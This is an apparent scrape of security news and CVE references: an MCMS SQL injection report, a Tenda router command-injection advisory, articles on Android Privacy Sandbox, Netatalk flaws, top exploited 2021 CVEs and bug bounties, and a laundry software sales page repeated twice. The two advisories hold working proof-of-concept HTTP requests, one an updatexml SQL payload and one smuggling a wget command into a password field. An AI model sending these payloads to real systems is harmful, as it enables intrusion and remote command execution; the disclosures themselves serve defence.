MCMS v5.2.27 was discovered to contain a SQL injection vulnerability in the orderBy parameter at /dict/list.do.

A suspicious point was found in the IDictDao.xml file in the lib,ms-mdiy-2.1.12  
.net.mingsoft.mdiy.dao.IDictDao.xml#145  

Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in net.mingsoft.mdiy.action.DictAction and found a call to

net.mingsoft.mdiy.biz.dictBiz#query  

we can know that the suspicious injection point is orderBy, and then try to inject

    
    GET /ms/mdiy/dict/list.do?pageNo=1&pageSize=22&orderBy=1/**/or/**/updatexml(1,concat(0x7e,user(),0x7e),1)/**/or/**/1 HTTP/1.1
    Host: 10.28.246.83:8080
    Content-Length: 0
    Pragma: no-cache
    Accept: application/json, text/plain, */*
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Origin: http://10.28.246.83:8080
    Referer: http://10.28.246.83:8080/ms/mdiy/dict/index.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=AAF6841C2E815174E1AF5498DBEDD12F; rememberMe=d56VV14gjxKRUu7SYYOTuOS8X48lfVhblbN4aL/wCBkaL805vU01qmEfZCk2PpqohqQ4bUuxyGvEzVrXqlVgeKFxrQHcgxhKPbzopVs4p5ftVg3+jnz3WkOHLrycrJKOVR+peOYM+3bbysPywLp/w/PGdFU0+ooXhCJbO8qMeXvR6U6RSTOOnvBq/P9ySYdwnqt0uIywoCNv8hE6gAgnhZUt4PBYLlZ4EekzFyLDqKJXJ5sOUuzR8/fPGjOoVzMydW3EIFJ0f2i59RQJe4fsx6i1NlnR1C9muMEaDUqj70Ec+M50tjnStsJNPCrSYzl2+KMzPXpoBS1DWCpURi5/ZCBp/FahWwnJZ6cA0owYZC9dXNC1b1FQoC2fIO5SPcNtEyySdD6c6BnA9Leei5iYTEIkPKHIw1oQhF7voRadkfW40ZmdPUTot5Gd8g7pDqpNNd/sig45EQtGqeXWwP45T2BcE1OKkPC9D+ELtqQSzOWcu7GUQkJ7jsECXu+ghoq/uihlh5Xdx1a8H8hhznmpJJd3hK2W+fy1IBAiH4GzkhQbepycUPqxD0t+ufNTFN5B0upouiyMiHSLejjdIkCl325p4rLi8TchVRxsKS0/Z9PflifFvaauQoTalNDa+vZXYvBrnVjXyRl3cUn4HPzTPBVNpXqnHPxf1jNtxtJKL09szd3OMRABDyIvL+T0JHl8pskKjEo80luOEP5f+ta2TW1XutmZJupbr6d97mfeRE9GDIYWFuHafXkh5uSBTkauPpQA7x25vhs1BjU5OVZ2ipfcPvH6WaPCcBJYM8Vqyd6g+5mdpsw7Hb27LcGxFo9dE39pBNjy8+1q6QqIojSfTRLfz1f/wGKgdOqy3x9z2+0SYi+irxF52r7FQgBZtTcGUu+1WPJJQEmG3BnUAkI7hpG1BmmjeHjDRgnOvA+L1LugHVQUYNN/Z8XzahHcDkNHr54/WXeQP56p0LC/E/D+XMCOSxCYkYnZdboRABf4Hwj+THJSTp+ZRsFjrZt27WWhJtDfGTgahpJLPioFUT/3HCnZKz529Ia9R1dTMHaKlxYrxf04GvgNCiFmslLqZX+9RlZizYNXCLRKECj83ovRCFJP5Ofg9SK+fNKNruL4uW5U4B+vLEuLhxCv7BzGFpjjciIOh8z6ypCQJDkuYUv/rffs0F1ngGI8TdAKhFxMnVbyUplk0+cYVQaBx1JTablsA+VgSl8n8+qhDoNA44TBg4OsrTaSMhcCha5b7OwczozSFDvJOR15GXgIKbJOTGSAJ5JhFFeQhkmpVWOGC4d9KdmHl6KUIOyB8DtO2ZU/XpTPbvFQGLvyyo1t7dPrvzHqG9LYmoQAcye6278=
    Connection: close

CVE-2022-27466: MCMS 5.2.7 SQLI · Issue #90 · ming-soft/MCMS

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Google has officially released the first developer preview for the Privacy Sandbox on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online.
"The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview.
A "multi-year effort,"

Google has officially released the first developer preview for the **Privacy Sandbox** on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online.

"The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview.

A "multi-year effort," Privacy Sandbox on Android aims to create technologies that's both privacy-preserving as well as keep online content and services free without having to resort to opaque methods of digital advertising.

The idea is to limit sharing of user data with third-parties and operate without cross-app identifiers, including advertising ID, a unique, user-resettable string of letters and digits that can be used to track users as they move between apps.

Google originally announced its plans to bring Privacy Sandbox to Android earlier this February, following the footsteps of Apple's App Tracking Transparency (ATT) framework.

Integral to the proposed initiative are two key solutions —

*   **SDK Runtime**, which runs third-party code in mobile apps such as software development kits (SDKs), including those for ads and analytics, in a dedicated sandbox, and

*   **Topics API**, which gleans "coarse-grained" interest signals on-device based on a user's app usage that are then shared with advertisers to serve tailored ads without cross-site and cross-app tracking

To address criticisms that the model could possibly give Google an unfair advantage, the tech behemoth noted that the privacy-oriented systems will be developed as part of the Android Open Source Project (AOSP) to ensure transparency into the design and implementation of these solutions.

"Android will collaborate with the entire industry and app ecosystem on the journey to a more privacy-first mobile platform, and one which supports a rich diversity of value-exchange that benefits users, developers, and advertisers," the company said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Releases First Developer Preview of Privacy Sandbox on Android 13

QNAP and Synology say flaws in the Netatalk fileserver allow remote code execution and information disclosure.

Network attached storage (NAS) device vendors QNAP and Synology this week disclosed multiple critical vulnerabilities in an open source fileserver technology integrated into their products.

The vulnerabilities — several of which enable remote code execution (RCE) — exist in Netatalk, an open source version of Apple File Protocol fileserver for accessing network shares in multiple operating system environments. Both vendors are still working on updating all versions of their products that contain the vulnerability.

**Unpatched for Months**  
Security researchers working in coordination with the Zero Day Initiative (ZDI) reported a total of six vulnerabilities to the maintainers of Netatalk in December. Three of them are critical RCE bugs tied to buffer-overflow issues (CVE-2022-0194; CVE-2022-23122; CVE-2022-23125). Two of the flaws are medium-severity out-of-bounds information-disclosure vulnerabilities (CVE-2022-23124; CVE-2022-23123), and one is a critical RCE issue tied to improper handling of exceptional conditions (CVE-2022-23121).

Brian Gorenc, senior director of vulnerability research and head of ZDI at Trend Micro, tells Dark Reading that all the Netatalk bugs were first discovered at Pwn2Own Austin in November 2021.

Another flaw, a high-severity buffer-overflow related RCE (CVE-2021-31439), was disclosed to Netatalk's maintainers all the way back in March 2021.

The development team at Netatalk released an updated version of the software (Netatalk 3.1.13) on March 23 that addressed all seven of the vulnerabilities. The updated version is available for all currently supported operating systems: FreeBSD, Linux, OpenBSD, NetBSD, and Solaris and derivates.

However, it's a longer timeline for some vendors to roll the patches into their products. ZDI's Gorenc says that because Netatalk is a third-party component used by many NAS vendors, the vendors are responsible for monitoring for releases of Netatalk and integrating these releases into their products. "We are glad to see the NAS vendors updating their Netatalk deployments to resolve the vulnerabilities that were disclosed and fixed at Pwn2Own Austin," he says.

Western Digital is another vendor whose products were impacted by the flaws in Netatalk. But unlike Synology and QNAP, Western Digital proactively removed Netatalk from its products on Jan. 10, 2022, citing concerns over multiple critical vulnerabilities in the technology.

"Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022," the company announced in March. "Users can continue to access local network shares and perform Time Machine backup via SMB."

**Affected Devices**  
Synology's advisory described the vulnerabilities as critical and allowing remote attackers to steal sensitive data. Bad actors could potentially execute arbitrary code on NAS devices via a vulnerable version of its DiskStation Manager (DSM) and Synology Router Manager (SRM) technologies.

QNAP identified multiple versions of its QTS operating system as being vulnerable and said it is currently investigating the flaws. The company said that it's working on releasing updates to all impacted products, and it urged customers to install the updates as soon as they become available.

The Taiwan-based NAS manufacturer also outlined steps that organizations can take to mitigate the risk posed by the vulnerabilities while it works on fixes. QNAP's advisory identified CVE-2021-31439 — the flaw from last March — as one of the issues that it still needs to address in its products even though it was disclosed more than one year ago.

Both Synology and QNAP did not immediately respond to requests for comment from Dark Reading.

Critical Vulnerabilities Leave Some Network-Attached Storage Devices Open to Attack

International cybersecurity authorities have published an overview of the most routinely exploited vulnerabilities of 2021.
The post The top 5 most routinely exploited vulnerabilities of 2021 appeared first on Malwarebytes Labs.

A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.

**1\. Log4Shell**

CVE-2021-44228, commonly referred to as Log4Shell or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.

When Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.

This made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.

The Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The CISA Log4j scanner is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.

**2\. CVE-2021-40539**

CVE-2021-40539 is a REST API authentication bypass vulnerability in ManageEngine’s single sign-on (SSO) solution with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that APT threat-actors were likely among those exploiting the vulnerability.

The vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.

For those that have never heard of this software, it’s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.

The ManageEngine site has specific instructions on how to identify and update vulnerable installations.

**3\. ProxyShell**

Third on the list are 3 vulnerabilities that we commonly grouped together and referred to as ProxyShell. CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207.

The danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:

*   **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.
*   **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.
*   **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.

The vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.

Microsoft’s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.

**4\. ProxyLogon**

After the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name—ProxyLogon—for similar reasons. CVE-2021-26855, CVE-2021-26857, CVE-2021-2685, and CVE-2021-27065 all share the same description—”This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.”

While the CVE description is the same for the 4 CVE’s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws—CVE-2021-26858 and CVE-2021-27065—would allow an attacker to write a file to any part of the server.

Together these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.

ProxyLogon started out as a limited and targeted attack method attributed to a group called Hafnium. Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

Microsoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a download link, user instructions, and more information can be found in the Microsoft Security Response Center.

**5\. CVE-2021-26084**

CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of Confluence Server and Data Center that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.

Shortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.

On the Confluence Support website you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.

**Lessons learned**

What does this list tell us to look out for in 2022?

Well, first off, if you haven’t patched one of the above we would urgently advise you to do so. And it wouldn’t hurt to continue working down the list provided by CISA.

Second, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:

*   **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.
*   **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.
*   **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.

So, if you notice or hear about a vulnerability that meets these “requirements” move it to the top of your “to-patch” list.

Stay safe, everyone!

The top 5 most routinely exploited vulnerabilities of 2021

New web targets for the discerning hacker

New web targets for the discerning hacker

Bug Bounty hunters who’d like a little more financial predictability in their lives were given that option this month, with a new program from Intigriti offering payment by the hour.

A combination of bug bounty hunting and penetration testing models, there will be payment for the number of hours a participant spends searching for vulnerabilities, as well as a capped reward for individual bugs. In a pre-launch pilot, hackers collectively earned more than €100,000 ($106,000).

In payout news, a hacker who goes by the name ‘Stealthy’ netted $36,000 in bug bounties after uncovering critical HTTP request smuggling vulnerabilities affecting three of Apple’s core web applications.

Queue poisoning attacks enabled data disclosure and account takeover with no user interaction required, Stealth explained. The bugs affected servers for business.apple.com, school.apple.com, and mapsconnect.apple.com.

Two hacking contests earlier this month also saw researchers earn a bumper crop of rewards.

There were payouts totalling $400,000 at the second edition of Pwn2Own Miami for dozens of previously undiscovered exploits targeting industrial control systems, for instance.

Daan Keuper and Thijs Alkemade were crowned Masters of Pwn with 90 points and $90,000 accrued for their team, while rewards were given for previously unknown zero-day vulnerabilities in industrial control platforms.

Meanwhile, ‘Hack Me I’m Famous’, an overnight hackathon held by bug bounty platform YesWeHack, saw 40 bug bounty hunters compete to find vulnerabilities in French scale-ups or start-ups valued at more than $1 billion.

Of 109 vulnerability reports, 30% were rated as either high or critical severity bugs, with one researcher netting the maximum payout of €10,000.

And finally, an access control vulnerability in open source scheduling platform Easy!Appointments was found to give unauthenticated attackers easy access to personally identifiable information. An unprotected API could expose names, places, and times of bookings made using the app.

The find earned Francesco Carlucci, founder of vulnerability notification platform OpenCIRT, a “small” reward.

**The latest bug bounty programs for May 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**AEX**

Program provider:  
HackenProof

Program type:  
Public

Max reward:  
$5,000

Outline:  
Digital asset exchange AEX is looking to find critical bugs in its web, mobile, and API targets.

Notes:  
There is an extensive list of out-of-scope targets that must be avoided. As ever, it’s worth taking a look before you start hunting.

Check out the AEX bug bounty page at HackenProof for more details

**American Systems**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$3,000

Outline:  
Management consulting services firm American Systems said it “looks forward to working with the security community to find vulnerabilities in order to keep our businesses and customers safe”.

Notes:  
Rewards are based on severity per CVSS. However, the company said these are “general guidelines, and reward decisions are up to the discretion of American Systems”.

Check out the American Systems’bug bounty page at HackerOne for more details

**ExpressVPN – enhanced**

Program provider:  
Bugcrowd

Program type:  
Public

Max reward:  
$100,000

Outline:  
ExpressVPN has increased its top reward – which is now 10 times higher than the previous highest bounty – with $10,000 now on offer for valid critical flaws unearthed in ExpressVPN’s TrustedServer.

Notes:  
ExpressVPN built TrustedServer to mitigate the risks posed by traditional server management and the elevated bug bounty reward supplements an independent security audit by PwC.

Read the related ExpressVPN press release for more details

**IoTex**

Program provider:  
HackenProof

Program type:  
Public

Max reward:  
$15,000

Outline:  
IoTeX is “the leading decentralized network powering the future of web3 and machine economy (MachineFi)”. It is asking researchers to find vulnerabilities in its web domains, mobile apps, and APIs.

Notes:  
The top three vulnerabilities in scope are business logic issues, payments manipulation, and remote code execution.

Check out the IoTex bug bounty page at HackenProof for more details

**KAYAK**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$5,000

Outline:  
Travel company KAYAK is asking for reports related to vulnerabilities in its website, as well as a number of its subsidiaries.

Notes:  
Not all of KAYAK’s subsidiaries are in scope, so make sure to confirm before hacking.

Check out the KAYAK bug bounty page at HackerOne for more details

**Mastadon – enhanced**

Program provider:  
Intigriti

Program type:  
Public

Max reward:  
€20,000

Outline:  
Mastodon has increased its maximum payout bounty to €20,000.

Notes:  
The bug bounty platform announced on Twitter that the first hacker to claim the new maximum reward will also be gifted with a swag package. Don’t walk, run!

Check out the Mastodon bug bounty page at Intigriti for more details

**SHEIN**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$2,000

Outline:  
Fast fashion retailer SHEIN has launched a bug bounty program that includes targets related to its sister company Romwe.

Notes:  
This program comes after a successful, limited program last year.

Check out the SHEIN bug bounty page at HackerOne for more details

**Sorare**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$10,000

Outline:  
Sorare is a global fantasy football game where managers can trade official digital collectibles.

Notes:  
Three assets are in scope: Sorare.com plus Sorare’s API and WebSocket domain.

Check out the Sorare bug bounty page at HackerOne for more details

**Other bug bounty and VDP news this month**

*   Pfizer has launched a vulnerability disclosure program with HackerOne, because looking for “potential issues helps us ensure the security and privacy of customers and data”.
*   Love swag? Who doesn’t! Intigriti has been giving away monthly swag bags on Twitter – see here.

Additional reporting by Emma Woollacott.

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for April 2022

Bug Bounty Radar // The latest bug bounty programs for May 2022

Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection.

**About Us**

We **Red Planet Computers** has started development in Laundry Management System in 2017. We have 7+ years experience in development, customization and implementation Web, Mobile application Services.

*   Well and Experienced Staff.
*   User Friendly Services
*   24x7 remote support servies

Our team have hands-on experience in all aspects of IT planning, deployment, operational management and maintenance support. Our design consultants design solutions that fit best within your environment and help achieve your laundry business goals – working with you as trusted advisors to help determine the best solution for your laundry business.

See More

**Development Skills**

**Laundry Management System Developed in following skills**

Our professional and experience developers team are used skill to the top most computer launguages and framworks for ui design, developement, making user friendly and secure laundry application for small business.

Boostrap & CSS _Website and Admin UI Design_

Javascript & Ajax _Website Development_

PHP Codeigniter & Mysqli _Website and Admin Panel_

Flutter, Swift and Kotlin _Android, iOS Mobile App_

**Screenshots**

Here some application UI screens to help you how its look and work LMS Application

*   Admin
*   Website
*   Mobile

**Pricing**

**RPL Standard Package  
(Point Of Sale\*)****INR 30K USD $399/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS Screen Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI
*   One Year Free Service & Updates.

Buy Now

**RPL Professional Package  
(E-Commerce\*)****INR 50K USD $649/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS+E-Comm Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)
*   One Year Free Service & Updates.

Buy Now

**RPL Development Package  
(Customization\*\*)****Extra 50% POS+50% (OR) E-Commerce+50%**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS/E-Commerce Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)         \[ as per your requirements\*\* \]
*   One Year Free Service & Updates.

Buy Now

\* Terms and Conditions apply (see FAQ section )  
\*\* Cost may vary depends on the customization

**Frequently Asked Questions**

Here are some of the most Frequently Asked Questions for Laundry Management Systems.

*   Can we get all liceses for lifetime ?
    
    Ans : Yes, if you purchase application with full source code then it's one-time payment and you will get multiple digital license \[lifetime\]. The amount is non-refundable , Once if you have got full source code then you will not getting return amount for any circumstances.
    
*   After purchase full source code can we sell this software ?
    
    Ans : Yes, after purchase application with full source code then you can use or sell anywhere with remove red planet computers company logo and name.
    
*   Can you will provide full source code ?
    
    Ans : Yes, you should have to pay 100% amount, if you want application with full source code. We will send full source code (zip or download link ) within half hours after successfully payment done. We will not provide any kind of equipment. Only RPL Business Package we will not provide source files.
    
*   What is **RPL Development / Customization Package** ?
    
    Ans : If you want manipulation or any changes in application through our professional developer team then you will have to pay selected (standard or professional) package amount plus extra 50% amount for manipulation charges. **Firstly, you have to pay 70% amount of total amount** and remaining 30% amount to pay after project completed, but note that in this period you will not getting full source code, you will getting our web hosting softwares link for testing, after completed project and 100% payment done then we will upload full source code in your website/web hosting server or send full source code link).  
    \- As per your requirement, project will be completed within 20-25 days or earlier.  
    \- Bulk SMS, Payment Gateway, Apple App Store, Google Map API & Play Store Console charges you will have to pay, if you are require.
    
*   Service and Support ?
    
    Ans : We will provide a FREE technical support upto one year after purchase LMS Application. We will answer your question regarding website management, technical details or anything about operating your own website; we can provide this through remotly in 24x7 Hours.
    

**Free Trail Full Version**

Not required fill any personal information or credit card details just click on button and login it

Username : admin  
Password : 1234  
\[ Admin Login Details \]

  
Best view in Desktop or Laptop

Mobile : 8767228990  
Password : 1983  
\[ Demo User Login Details \]

  
Best view in Desktop or Laptop

User Mobile : 8767228990  
Driver Mobile : 1234567890  
\[ Demo User / Driver Login Details \]

   
iOS app install : Download and Extract zip in Mac-OS then drag-drop .app file on Xcode 10+ simulator or connected iphone {iOS v10.0+}.

**Contact**

You can call to us 24x7 regarding Laundry Management System enquiry or solutions

**Location:**

B-02, Sai Sanklap Complex, Survey No. 145/0,  
Usarli Khurd, Panvel, Mumbai, India 410206

**Call:**

Mobile : +91 87672 28990.  
Whatsapp : +91 87672 28990.  
Skype : rpcits2013 / +918767228990.

CVE-2022-28452: Better solutions for Small Laundry and Dry Cleaning Business

**About Us**

We **Red Planet Computers** has started development in Laundry Management System in 2017. We have 7+ years experience in development, customization and implementation Web, Mobile application Services.

*   Well and Experienced Staff.
*   User Friendly Services
*   24x7 remote support servies

Our team have hands-on experience in all aspects of IT planning, deployment, operational management and maintenance support. Our design consultants design solutions that fit best within your environment and help achieve your laundry business goals – working with you as trusted advisors to help determine the best solution for your laundry business.

See More

**Development Skills**

**Laundry Management System Developed in following skills**

Our professional and experience developers team are used skill to the top most computer launguages and framworks for ui design, developement, making user friendly and secure laundry application for small business.

Boostrap & CSS _Website and Admin UI Design_

Javascript & Ajax _Website Development_

PHP Codeigniter & Mysqli _Website and Admin Panel_

Flutter, Swift and Kotlin _Android, iOS Mobile App_

**Screenshots**

Here some application UI screens to help you how its look and work LMS Application

*   Admin
*   Website
*   Mobile

**Pricing**

**RPL Standard Package  
(Point Of Sale\*)****INR 25K USD $349/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS Screen Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI
*   One Year Free Service & Updates.

Buy Now

**RPL Professional Package  
(E-Commerce\*)****INR 45K USD $599/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS+E-Comm Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)
*   One Year Free Service & Updates.

Buy Now

**RPL Development Package  
(Customization\*\*)****Extra 50% POS+50% (OR) E-Commerce+50%**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS/E-Commerce Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
